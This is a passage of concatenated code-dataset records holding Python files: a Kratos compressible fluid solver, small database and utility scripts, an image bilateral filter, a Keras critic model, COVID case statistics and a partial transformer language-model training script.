query2accession, t2n\n\nhth_anno()\n","sub_path":"ProjectOfAcrDetectorScript/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"485794839","text":"from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7\n# Importing the Kratos Library\nimport KratosMultiphysics\nimport KratosMultiphysics.FluidDynamicsApplication as KratosFluid\n\n## Import base class file\nfrom KratosMultiphysics.FluidDynamicsApplication.fluid_solver import FluidSolver\n\nfrom KratosMultiphysics import python_linear_solver_factory as linear_solver_factory\nfrom KratosMultiphysics.FluidDynamicsApplication import check_and_prepare_model_process_fluid\n\ndef CreateSolver(model, custom_settings):\n return NavierStokesCompressibleSolver(model, custom_settings)\n\nclass NavierStokesCompressibleSolver(FluidSolver):\n\n @classmethod\n def GetDefaultSettings(cls):\n ##settings string in json format\n default_settings = KratosMultiphysics.Parameters(\"\"\"\n {\n \"solver_type\": \"compressible_solver_from_defaults\",\n \"model_part_name\": \"\",\n \"domain_size\": -1,\n \"model_import_settings\": {\n \"input_type\": \"mdpa\",\n \"input_filename\": \"two_element_test\",\n \"reorder\": false\n },\n \"maximum_iterations\": 10,\n \"echo_level\": 1,\n \"time_order\": 2,\n \"compute_reactions\": false,\n \"reform_dofs_at_each_step\" : true,\n \"relative_tolerance\" : 1e-3,\n \"absolute_tolerance\" : 1e-5,\n \"linear_solver_settings\" : {\n \"solver_type\" : \"amgcl\",\n \"max_iteration\" : 200,\n \"tolerance\" : 1e-7,\n \"provide_coordinates\" : false,\n \"smoother_type\" : \"ilu0\",\n \"krylov_type\" : \"gmres\",\n \"coarsening_type\" : \"aggregation\",\n \"scaling\" : true,\n \"verbosity\" : 0\n },\n \"volume_model_part_name\" : \"volume_model_part\",\n \"skin_parts\": [\"\"],\n \"no_skin_parts\":[\"\"],\n \"time_stepping\" : {\n \"automatic_time_step\" : true,\n \"CFL_number\" : 1,\n \"minimum_delta_time\" : 1e-4,\n \"maximum_delta_time\" : 0.01\n },\n \"periodic\": \"periodic\",\n \"move_mesh_flag\": false\n }\"\"\")\n\n default_settings.AddMissingParameters(super(NavierStokesCompressibleSolver, cls).GetDefaultSettings())\n return default_settings\n\n def __init__(self, model, custom_settings):\n self._validate_settings_in_baseclass=True # To be removed eventually\n super(NavierStokesCompressibleSolver,self).__init__(model,custom_settings)\n\n self.element_name = \"CompressibleNavierStokes\"\n self.condition_name = \"Condition\"\n self.min_buffer_size = 3\n\n ## Construct the linear solver\n self.linear_solver = linear_solver_factory.ConstructSolver(self.settings[\"linear_solver_settings\"])\n\n ## Set the element replace settings\n #self._SetCompressibleElementReplaceSettings()\n\n print(\"Construction of NavierStokesCompressibleSolver finished.\")\n\n\n def AddVariables(self):\n\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.MOMENTUM)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.TOTAL_ENERGY)\n\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.CONDUCTIVITY)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.SPECIFIC_HEAT)\n self.main_model_part.AddNodalSolutionStepVariable(KratosFluid.HEAT_CAPACITY_RATIO)\n\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.BODY_FORCE)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NODAL_H) ## ?\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NODAL_AREA) ## ?\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION) #for momentum\n self.main_model_part.AddNodalSolutionStepVariable(KratosFluid.REACTION_DENSITY) #for momentum\n self.main_model_part.AddNodalSolutionStepVariable(KratosFluid.REACTION_ENERGY) #for momentum\n\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FLAG_VARIABLE) ## ?\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NORMAL)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.Y_WALL) ## ?\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.EXTERNAL_PRESSURE)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.KINEMATIC_VISCOSITY)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DYNAMIC_VISCOSITY)\n\n # Post-process\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.PRESSURE)\n self.main_model_part.AddNodalSolutionStepVariable(KratosFluid.MACH) #for momentum\n\n print(\"Monolithic compressible fluid solver variables added correctly\")\n\n def AddDofs(self):\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.MOMENTUM_X, KratosMultiphysics.REACTION_X, self.main_model_part)\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.MOMENTUM_Y, KratosMultiphysics.REACTION_Y, self.main_model_part)\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.MOMENTUM_Z, KratosMultiphysics.REACTION_Z, self.main_model_part)\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DENSITY, KratosFluid.REACTION_DENSITY, self.main_model_part)\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.TOTAL_ENERGY, KratosFluid.REACTION_ENERGY, self.main_model_part)\n\n def Initialize(self):\n self.computing_model_part = self.GetComputingModelPart()\n\n # If needed, create the estimate time step utility\n if (self.settings[\"time_stepping\"][\"automatic_time_step\"].GetBool()):\n print(\"ERROR: _GetAutomaticTimeSteppingUtility out of date\")\n #self.EstimateDeltaTimeUtility = self._GetAutomaticTimeSteppingUtility()\n\n # Set the time discretization utility to compute the BDF coefficients\n time_order = self.settings[\"time_order\"].GetInt()\n if time_order == 2:\n self.time_discretization = KratosMultiphysics.TimeDiscretization.BDF(time_order)\n else:\n raise Exception(\"Only \\\"time_order\\\" equal to 2 is supported. Provided \\\"time_order\\\": \" + str(time_order))\n\n # Creating the solution strategy\n self.conv_criteria = KratosMultiphysics.ResidualCriteria(self.settings[\"relative_tolerance\"].GetDouble(),\n self.settings[\"absolute_tolerance\"].GetDouble())\n\n\n #(self.conv_criteria).SetEchoLevel(self.settings[\"echo_level\"].GetInt()\n (self.conv_criteria).SetEchoLevel(3)\n\n domain_size = self.main_model_part.ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n rotation_utility = KratosFluid.CompressibleElementRotationUtility(domain_size,KratosMultiphysics.SLIP)\n time_scheme = KratosMultiphysics.ResidualBasedIncrementalUpdateStaticSchemeSlip(rotation_utility)\n #time_scheme = KratosMultiphysics.ResidualBasedIncrementalUpdateStaticScheme() # DOFs (4,5)\n\n\n builder_and_solver = KratosMultiphysics.ResidualBasedBlockBuilderAndSolver(self.linear_solver)\n\n\n self.solver = KratosMultiphysics.ResidualBasedNewtonRaphsonStrategy(self.computing_model_part,\n time_scheme,\n self.linear_solver,\n self.conv_criteria,\n builder_and_solver,\n self.settings[\"maximum_iterations\"].GetInt(),\n self.settings[\"compute_reactions\"].GetBool(),\n self.settings[\"reform_dofs_at_each_step\"].GetBool(),\n self.settings[\"move_mesh_flag\"].GetBool())\n\n\n (self.solver).SetEchoLevel(self.settings[\"echo_level\"].GetInt())\n #(self.solver).SetEchoLevel(1)\n\n\n (self.solver).Initialize()\n\n\n # self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.DYNAMIC_TAU, self.settings[\"dynamic_tau\"].GetDouble()) # REMEMBER TO CHECK MY STAB CONSTANTS\n\n print (\"Monolithic compressible solver initialization finished.\")\n\n\n def InitializeSolutionStep(self):\n (self.time_discretization).ComputeAndSaveBDFCoefficients(self.GetComputingModelPart().ProcessInfo)\n (self.solver).InitializeSolutionStep()\n\n\n def Solve(self):\n (self.time_discretization).ComputeAndSaveBDFCoefficients(self.GetComputingModelPart().ProcessInfo)\n (self.solver).Solve()\n\n def PrepareModelPart(self):\n super(NavierStokesCompressibleSolver,self).PrepareModelPart()\n if not self.main_model_part.ProcessInfo[KratosMultiphysics.IS_RESTARTED]:\n self._ExecuteAfterReading()\n\n def _ExecuteAfterReading(self):\n ## Replace element and conditions\n KratosMultiphysics.ReplaceElementsAndConditionsProcess(self.main_model_part, self.settings[\"element_replace_settings\"]).Execute()\n\n ## Check that the input read has the shape we like\n prepare_model_part_settings = KratosMultiphysics.Parameters(\"{}\")\n prepare_model_part_settings.AddValue(\"volume_model_part_name\",self.settings[\"volume_model_part_name\"])\n prepare_model_part_settings.AddValue(\"skin_parts\",self.settings[\"skin_parts\"])\n\n check_and_prepare_model_process_fluid.CheckAndPrepareModelProcess(self.main_model_part, prepare_model_part_settings).Execute()\n\n\n #def _SetCompressibleElementReplaceSettings(self):\n #domain_size = self.main_model_part.ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n #self.settings.AddEmptyValue(\"element_replace_settings\")\n\n #if(domain_size == 3):\n #self.settings[\"element_replace_settings\"] = KratosMultiphysics.Parameters(\"\"\"\n #{\n #\"element_name\":\"CompressibleNavierStokes3D4N\",\n #\"condition_name\": \"Condition3D3N\"\n #}\n #\"\"\")\n #elif(domain_size == 2):\n #self.settings[\"element_replace_settings\"] = KratosMultiphysics.Parameters(\"\"\"\n #{\n #\"element_name\":\"CompressibleNavierStokes2D3N\",\n #\"condition_name\": \"Condition2D2N\"\n #}\n #\"\"\")\n #else:\n #raise Exception(\"Domain size is not 2 or 3!!\")\n","sub_path":"applications/FluidDynamicsApplication/python_scripts/navier_stokes_compressible_solver.py","file_name":"navier_stokes_compressible_solver.py","file_ext":"py","file_size_in_byte":11146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"409324686","text":"import sqlite3\n\nwith sqlite3.connect('db/sqlite3.db') as connection:\n # create db cursorcursor()\n cursor = connection.cursor()\n\n data = (\n (\"Jean-Baptiste Zorg\", \"Human\", 122),\n (\"Korben Dallas\", \"Meat Popsicle\", 100),\n (\"Ak'not\", \"Mangalore\", -5)\n )\n\n cursor.executemany(\"INSERT INTO Roster VALUES(?, ?, ?);\", data)","sub_path":"chapters/14/exercises/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"347809169","text":"from avocado.query.translators import Translator, registry\nfrom modeltree.tree import trees\n\n\nclass AllowMissingRecord(Translator):\n \"\"\"\n HGMD is the only source of data for the variant-phenotype assocations.\n This leads to a nuance in what it means to \"not be in HGMD\". By default,\n Avocado adds a second condition to ensure the ID is also not null if the\n field itself is nullable (to exclude missing records). However because\n records _only_ exist if there is an HGMD ID, this behavior is confusing.\n\n This translator overrides this behavior and adds an OR to allow for no\n records if querying for an explicit NULL.\n \"\"\"\n def translate(self, field, roperator, rvalue, tree, **kwargs):\n output = super(AllowMissingRecord, self).translate(\n field, roperator, rvalue, tree, **kwargs)\n cleaned_data = output['cleaned_data']\n\n if (cleaned_data['operator'].lookup == 'isnull'\n and cleaned_data['value']):\n # Create a null condition for this field\n null_condition = trees[tree].query_condition(\n field.model._meta.pk, 'isnull', True)\n # Allow the null condition\n output['query_modifiers']['condition'] = null_condition\n return output\n\n\nregistry.register(AllowMissingRecord, 'Allow Missing Record')\n","sub_path":"varify/phenotypes/translators.py","file_name":"translators.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"565470253","text":"from distutils.core import setup\nimport numpy\n\ndef find_version(path):\n import re\n # path shall be a plain ascii text file.\n s = open(path, 'rt').read()\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n s, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Version not found\")\n\nsetup(\n name=\"mpi4py_test\",\n version=find_version(\"mpi4py_test/version.py\"),\n author=\"Yu Feng\",\n author_email=\"rainwoodman@gmail.com\",\n url=\"http://github.com/rainwoodman/mpi4py_test\",\n description=\"Simple testing based on numpy for applications written with mpi4py.\",\n zip_safe = False,\n package_dir = {'mpi4py_test': 'mpi4py_test'},\n install_requires=['numpy', 'mpi4py'],\n license='BSD-2-Clause',\n packages= ['mpi4py_test', 'mpi4py_test.tests'],\n requires=['numpy', 'mpi4py'],\n)\n","sub_path":"pypi_install_script/mpi4py_test-0.0.10.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"2952139","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport cv2\nimport math\n\ndef sliding_window(image,padded_image,window = 3):\n\ta = np.zeros(image.shape)\n\tfor x in range(image.shape[0]):\n\t\tfor y in range(image.shape[1]):\n\t\t\twin_im = padded_image[x:x+window, y:y+window]\n\t\t\t# print(image[x,y])\n\n\t\t\ta[x][y][0] = bilateral_filter(win_im[:,:,0])\n\t\t\ta[x][y][1] = bilateral_filter(win_im[:,:,1])\n\t\t\ta[x][y][2] = bilateral_filter(win_im[:,:,2])\n\treturn a\n\ndef padding(im,kernel_row=3,kernel_col=3):\n\timage_row, image_col,ch = im.shape\n\n\tpad_height = int((kernel_row - 1) / 2)\n\tpad_width = int((kernel_col - 1) / 2)\n\t \n\tpadded_image = np.zeros((image_row + (2 * pad_height), image_col + (2 * pad_width),ch))\n\tprint(padded_image.shape)\n\t \n\tpadded_image[pad_height:padded_image.shape[0] - pad_height, pad_width:padded_image.shape[1] - pad_width] = im\n\treturn padded_image\n\ndef weighting(x,sigma=1):\n\treturn math.exp(- (x ** 2) / (2 * sigma ** 2))\n\ndef bilateral_filter(win_im,sd=1,sr=1):\n\tw = 0 \n\tgk = 0\n\ti = int(win_im.shape[0]/2)\n\t# print(i)\n\tfor k in range(win_im.shape[0]):\n\t\tfor l in range(win_im.shape[1]):\n\t\t\t\n\t\t\td = weighting((i-k),sd) * weighting((i-l),sd)\n\t\t\t# print(d)\n\t\t\tv = abs(win_im[i][i] - win_im[k][l])\n\t\t\tr = weighting(v,sr)\n\t\t\tgk = gk + (win_im[k][l]*(r*d))\n\t\t\tw = w + (r*d)\n\n\treturn (gk/w)\n\nim = cv2.imread('gt_sky.png')# path needs to be channged all input images are available in the input folder\n# im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n# im = cv2.resize(im,(480,640))\npadded_image = padding(im,3,3)\noutput = sliding_window(im,padded_image,3)\ncv2.imwrite('gt _sky_ooo.jpg',output)# output images in the output folder can be used for refrence\n","sub_path":"a2_2019702002/src/q6/bilateral.py","file_name":"bilateral.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"643895959","text":"from keras import layers, models, optimizers\nfrom keras import backend as K\nimport tensorflow as tf\nfrom numpy.random import seed\nfrom tensorflow import set_random_seed\nseed(14)\nset_random_seed(14)\n\nclass Critic:\n \"\"\"Critic (Value) Model.\"\"\"\n\n def __init__(self, state_size, action_size, lr):\n \"\"\"Initialize parameters and build model.\n\n Params\n ======\n state_size (int): Dimension of each state\n action_size (int): Dimension of each action\n lr (float): Adam optimizer learning rate\n \"\"\"\n self.state_size = state_size\n self.action_size = action_size \n self.lr = lr\n\n self.build_model()\n\n def build_model(self):\n \"\"\"Build a critic (value) network that maps (state, action) pairs -> Q-values.\"\"\"\n states = layers.Input(shape=(self.state_size,))\n actions = layers.Input(shape=(self.action_size,))\n stat_act = layers.Concatenate()([states, actions])\n\n net = layers.Dense(units=400)(stat_act)\n net = layers.Activation('relu')(net)\n net = layers.Dense(units=300)(net)\n net = layers.Activation('relu')(net)\n \n Q_values = layers.Dense(1)(net)\n \n self.model = models.Model(inputs=[states, actions], outputs=Q_values) \n\n # Define optimizer and compile model for training with built-in loss function\n optimizer = optimizers.Adam(lr=self.lr)\n self.model.compile(optimizer=optimizer, loss='mse')\n\n # Compute action gradients (derivative of Q values w.r.t. to actions)\n gradients = K.gradients(Q_values, actions)\n self.get_gradients = K.function(\n inputs=[*self.model.input, K.learning_phase()], \n outputs=gradients) \n","sub_path":"agents/critic.py","file_name":"critic.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"67841192","text":"import random\ndef get_rand_list(x, y, n):\n k = random.sample(range(x,y), n)\n return k\ndef get_overlap(first, second):\n list = []\n for i in first:\n for k in second:\n if i == k:\n list.append(i)\n return list\ndef main():\n x = int(input(\"begin:\"))\n y = int(input(\"end:\"))\n n = int(input(\"N:\"))\n first = get_rand_list(x, y, n)\n second = get_rand_list(x, y, n)\n list = get_overlap(first, second)\n print(first)\n print(second)\n print(list)\n\nmain()","sub_path":"lab8/example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"594492041","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statistics\nimport collections\nfrom sklearn.linear_model import LinearRegression\n\n# Import and Clean Time Series\ndataset = pd.read_csv(\"CumulativeCases.csv\")\n\ndates = dataset['Date']\ncolombia_dataset = dataset['Colombia']\nbelgium_dataset = dataset['Belgium']\n\n# Create lists from the datasets.\nlist_colombia = list(colombia_dataset)\nlist_belgium = list(belgium_dataset)\n\n\n#### Measures of Central Tendency\n\ndef central_tendency_spread():\n #### MEAN ###\n mean_colombia = colombia_dataset.mean()\n mean_belgium = belgium_dataset.mean()\n\n print(\"Measures of Central Tendency\", end=\"\\n\\n\")\n print(\"Colombia Mean: \", mean_colombia)\n print('Belgium Mean: ', mean_belgium)\n\n #### MEDIAN\n median_colombia = colombia_dataset.median()\n median_belgium = belgium_dataset.median()\n\n print(\"Colombia Median: \", median_colombia)\n print('Belgium Median: ', median_belgium)\n\n #### MODE\n mode_colombia = colombia_dataset.mode()\n mode_belgium = belgium_dataset.mode()\n\n print(\"Colombia Mode: \", int(mode_colombia))\n print('Belgium Mode: ', int(mode_belgium), end=\"\\n\\n\\n\")\n\n variance_colombia = statistics.variance(list(colombia_dataset))\n variance_belgium = statistics.variance(list(belgium_dataset))\n \n print(\"Measures of Spread\", end=\"\\n\\n\")\n\n print(\"Colombia Variance: \", variance_colombia)\n print(\"Belgium Variance: \", variance_belgium)\n\n pvariance_colombia = statistics.pvariance(list(colombia_dataset))\n pvariance_belgium = statistics.pvariance(list(belgium_dataset))\n\n print(\"Colombia Population Variance: \", pvariance_colombia)\n print(\"Belgium Population Variance: \", pvariance_belgium)\n\n stdev_colombia = statistics.stdev(list(colombia_dataset))\n stdev_belgium = statistics.stdev(list(belgium_dataset))\n\n print(\"Colombia Standard Deviation: \", stdev_colombia)\n print(\"Belgium Standard Deviation: \", stdev_belgium)\n\n pstdev_colombia = statistics.pstdev(list(colombia_dataset))\n pstdev_belgium = statistics.pstdev(list(belgium_dataset))\n\n print(\"Colombia Population Standard Deviation: \", pstdev_colombia)\n print(\"Belgium Population Standard Deviation: \", pstdev_belgium)\n # Write Results into XSLX File\n\n data1 = {\n 'Measures of Central Tendency' : ['Mean', 'Median', 'Mode'],\n 'Belgium': [int(mean_belgium), int(median_belgium), int(mode_belgium)],\n 'Colombia' : [int(mean_colombia), int(median_colombia), int(mode_colombia)],\n }\n\n data2 = {\n 'Measures of Spread' : ['Variance', 'Population Variance', 'Standard Deviation', 'Population Standard Deviation'],\n 'Belgium' : [int(variance_belgium), int(pvariance_belgium), int(stdev_belgium), int(pstdev_belgium)],\n 'Colombia' : [int(variance_colombia), int(pvariance_colombia), int(stdev_colombia), int(pstdev_colombia)]\n }\n\n df1 = pd.DataFrame(data1, columns = ['Measures of Central Tendency', 'Belgium', 'Colombia'])\n df2 = pd.DataFrame(data2, columns = ['Measures of Spread', 'Belgium', 'Colombia'])\n\n # Save Results to Excel Files\n df1.to_excel('cent_tend.xlsx', index=False, header=True)\n df2.to_excel('spread.xlsx', index=False, header=True)\n\n\n### FREQUENCIES\ndef frequencies():\n freq_colombia = collections.Counter(list_colombia)\n freq_belgium = collections.Counter(list_belgium)\n\n print(\"Colombia Frequencies: \", freq_colombia, end=\"\\n\\n\")\n print(\"Belgium Frequencies: \", freq_belgium)\n\n # PLOT HISTOGRAM\n plt.style.use('ggplot')\n # Belgium\n plt.hist(list_belgium, bins=10, label=\"Belgium\")\n\n # Colombia\n plt.hist(list_colombia, bins=10, label=\"Colombia\")\n\n # Plot\n plt.legend()\n plt.show()\n\n\n# MOVING AVERAGES & VOLATILITY\nwindow_size = 10\n# convert list to series\nbelgium_series = pd.Series(list_belgium)\nbelgium_windows = belgium_series.rolling(window_size)\n\ncolombia_series = pd.Series(list_colombia)\ncolombia_windows = colombia_series.rolling(window_size)\n\n# remove NaN\nbelgium_moving_averages = belgium_windows.mean().tolist()[window_size - 1:]\ncolombia_moving_averages = colombia_windows.mean().tolist()[window_size - 1:]\n\ndef moving_averages():\n print(belgium_moving_averages)\n print(colombia_moving_averages)\n # Plot Moving Averages\n plt.plot(belgium_moving_averages, label=\"Belgium\")\n plt.plot(colombia_moving_averages, label=\"Colombia\")\n plt.legend()\n plt.show()\n\n# Volatility\nbelgium_volatility = belgium_windows.std(ddof=0).tolist()[window_size - 1:]\ncolombia_volatility = colombia_windows.std(ddof=0).tolist()[window_size - 1:]\n\ndef volatility():\n print(belgium_volatility)\n print(colombia_volatility)\n # Plot Volatility\n plt.plot(belgium_volatility, label=\"Belgium\")\n plt.plot(colombia_volatility, label=\"Colombia\")\n plt.legend()\n plt.show()\n\n\ndef write_avg_vol_to_csv():\n # Write Measures of Volatility and Average to .csv file\n data = {\n 'Belgium Volatility': belgium_volatility,\n 'Belgium Average' : belgium_moving_averages,\n 'Colombia Volatility' : colombia_volatility,\n 'Colombia Average' : colombia_moving_averages\n }\n\n df = pd.DataFrame(data, columns = ['Belgium Volatility', 'Belgium Average', 'Colombia Volatility', 'Colombia Average'])\n\n # Save Results to Excel Files\n df.to_csv('vol_avg.csv', index=False, header=True)\n\n# Linear Regression\ndef linear_regression():\n x = np.array(list_belgium).reshape(-1, 1)\n y = np.array(list_colombia)\n\n model = LinearRegression()\n model.fit(x, y)\n\n result = model.score(x, y)\n print(result)\n\n # Plot scatter plot to determine linear correlation\n x2 = np.array(list_belgium) # create 1D array for plot\n\n plt.plot(x2, y, 'o')\n m, b = np.polyfit(x2, y, 1)\n plt.plot(x2, m*x2, + b)\n plt.show()","sub_path":"Statistics-Assignment-master/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"373483559","text":"def pal(x):\n\tres=0\n\twhile x:\n\t\tres=res*10+x%10\n\t\tx//=10\n\treturn res\n\ndef ispal(x):\n\ts=str(x)\n\tlength=len(s)\n\tfor i in range(length//2):\n\t\tif(s[i]!=s[length-i-1]):\n\t\t\treturn False\n\treturn True\n\nn,k=map(int,input().split())\n\nstep=0\nif(ispal(n)):\n\tprint(n)\n\tprint(0)\n\texit()\nwhile(1):\n\tn+=pal(n)\n\tstep+=1\n\tif(ispal(n)):\n\t\tbreak\n\telif step==k:\n\t\tbreak\nprint(n)\nprint(step)","sub_path":"PAT/1024.py","file_name":"1024.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"136672768","text":"from urllib.parse import urlparse\nwith open('orgginal.txt') as f,open('out.txt', 'w') as f_out:\n for line in f:\n line = line.strip()\n parsed = urlparse(line)\n #print(line)\n newline=parsed._replace(query='').geturl()\n print(newline)\n #f_out.write('{}\\n'.format(line))\n\t","sub_path":"Python/tmp/url_pars/url_remove_string2.py","file_name":"url_remove_string2.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158094738","text":"import tensorflow as tf\nimport numpy as np\nimport os, time, math, json, joblib, random, argparse\n\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import accuracy_score\n\nfrom util.opt import adam\nfrom util.utils import iter_data, find_trainable_variables, ResultLogger, assign_to_gpu, average_grads, make_path\nfrom data.data import gen_squad_data\nfrom metrics.metrics import target_based_np_rouge\n\nfrom models.transformer_lm import language_model as model\n\n# modified from https://github.com/openai/finetune-transformer-lm/blob/master/train.py\n\ndef mgpu_train(*xs):\n gpu_ops = []\n gpu_grads = []\n xs = (tf.split(x, n_gpu, 0) for x in xs)\n for i, xs in enumerate(zip(*xs)):\n do_reuse = True if i > 0 else None\n with tf.device(assign_to_gpu(i, \"/gpu:0\")), tf.variable_scope(tf.get_variable_scope(), reuse=do_reuse):\n lm_logits, lm_losses = model(*xs, \n n_vocab=n_vocab, n_special=n_special, n_ctx=n_ctx, n_embd=n_embd, \n embd_pdrop=embd_pdrop, n_layer=n_layer, n_head=n_head, attn_pdrop=attn_pdrop, \n resid_pdrop=resid_pdrop, train=True, reuse=do_reuse)\n train_loss = tf.reduce_mean(lm_losses)\n params = find_trainable_variables(\"model\")\n grads = tf.gradients(train_loss, params)\n grads = list(zip(grads, params))\n gpu_grads.append(grads)\n gpu_ops.append([lm_logits, lm_losses])\n ops = [tf.concat(op, 0) for op in zip(*gpu_ops)]\n grads = average_grads(gpu_grads)\n grads = [g for g, p in grads]\n train = adam(params, grads, lr, lr_schedule, n_updates_total, warmup=lr_warmup, l2=l2, max_grad_norm=max_grad_norm, vector_l2=vector_l2, b1=b1, b2=b2, e=e)\n return [train]+ops\n\ndef mgpu_predict(*xs):\n gpu_ops = []\n xs = (tf.split(x, n_gpu, 0) for x in xs)\n for i, xs in enumerate(zip(*xs)):\n with tf.device(assign_to_gpu(i, \"/gpu:0\")), tf.variable_scope(tf.get_variable_scope(), reuse=True):\n lm_logits, lm_losses = model(*xs, \n n_vocab=n_vocab, n_special=n_special, n_ctx=n_ctx, n_embd=n_embd, \n embd_pdrop=embd_pdrop, n_layer=n_layer, n_head=n_head, attn_pdrop=attn_pdrop, \n resid_pdrop=resid_pdrop, train=False, reuse=True)\n gpu_ops.append([lm_logits, lm_losses])\n ops = [tf.concat(op, 0) for op in zip(*gpu_ops)]\n return ops\n\ndef iter_apply(Xs, Ms):\n fns = [lambda x:np.concatenate(x, 0), lambda x:float(np.sum(x))]\n results = []\n for xmb, mmb in iter_data(Xs, Ms, n_batch=n_batch_train, truncate=False, verbose=True):\n n = len(xmb)\n idx_mask = np.equal(xmb[:,:,0], delimiter).astype(int)\n end_idxs = np.argmax(np.equal(xmb[:,:,0], end).astype(int), 1)\n delim_idxs = np.argmax(idx_mask,1)\n if n == n_batch_train:\n for i in range(np.max(end_idxs - delim_idxs)):\n ev_logits, ev_lm_loss = sess.run([eval_mgpu_logits, eval_mgpu_lm_loss], {X_train:xmb, M_train:mmb})\n pred = np.argmax(ev_logits, 1)\n idx_mask = roll_mask(idx_mask)\n xmb = next_xmb(xmb, pred, idx_mask)\n if all_finished(np.reshape(pred,xmb[:,1:,0].shape), end):\n break\n else:\n for i in range(np.max(end_idxs - delim_idxs)):\n ev_logits, ev_lm_losses = sess.run([eval_logits, eval_lm_loss], {X:xmb, M:mmb})\n pred = np.argmax(ev_logits, 1)\n idx_mask = roll_mask(idx_mask)\n xmb = next_xmb(xmb, pred, idx_mask)\n if all_finished(np.reshape(pred,xmb[:,1:,0].shape), end):\n break\n res = [pred * n, ev_lm_loss * n]\n results.append(res)\n results = zip(*results)\n return [fn(res) for res, fn in zip(results, fns)]\n\ndef iter_predict(Xs, Ms):\n preds = []\n for xmb, mmb in iter_data(Xs, Ms, n_batch=n_batch_train, truncate=False, verbose=True):\n n = len(xmb)\n idx_mask = np.equal(xmb[:,:,0], delimiter).astype(int)\n end_idxs = np.argmax(np.equal(xmb[:,:,0], end).astype(int), 1)\n delim_idxs = np.argmax(idx_mask,1)\n if n == n_batch_train:\n for i in range(np.max(end_idxs - delim_idxs)):\n pred = np.argmax(sess.run(eval_mgpu_logits, {X_train:xmb, M_train:mmb}), 1)\n idx_mask = roll_mask(idx_mask)\n xmb = next_xmb(xmb, pred, idx_mask)\n if all_finished(np.reshape(pred,xmb[:,1:,0].shape), end):\n break\n else:\n for i in range(np.max(end_idxs - delim_idxs)):\n pred = np.argmax(sess.run(eval_logits, {X:xmb, M:mmb}), 1)\n idx_mask = roll_mask(idx_mask)\n xmb = next_xmb(xmb, pred, idx_mask)\n if all_finished(np.reshape(pred,xmb[:,1:,0].shape), end):\n break\n preds.append(pred)\n preds = np.concatenate(preds, 0)\n return preds\n\ndef next_xmb(xmb, pred, idx_mask):\n reshaped_pred = np.reshape(pred,xmb[:,1:,0].shape)\n pad = np.zeros_like(xmb[:,:1,0])\n m_xmb = xmb*np.expand_dims(1-idx_mask,2)\n m_pred = np.expand_dims(np.concatenate([reshaped_pred,pad],1)*idx_mask,2)\n return m_xmb + m_pred\n\ndef all_finished(t, end):\n return np.sum(np.any(np.equal(t, end),1)) == len(t)\n\ndef roll_mask(m):\n e_slice = np.zeros_like(m[:,:1])\n r_slice = np.roll(m,1)[:,1:]\n rm = np.concatenate([e_slice,r_slice],1)\n return rm\n\ndef save(path):\n ps = sess.run(params)\n joblib.dump(ps, make_path(path))\n\ndef log():\n global best_score\n tr_preds, tr_cost = iter_apply(trX[:n_valid], trM[:n_valid])\n va_preds, va_cost = 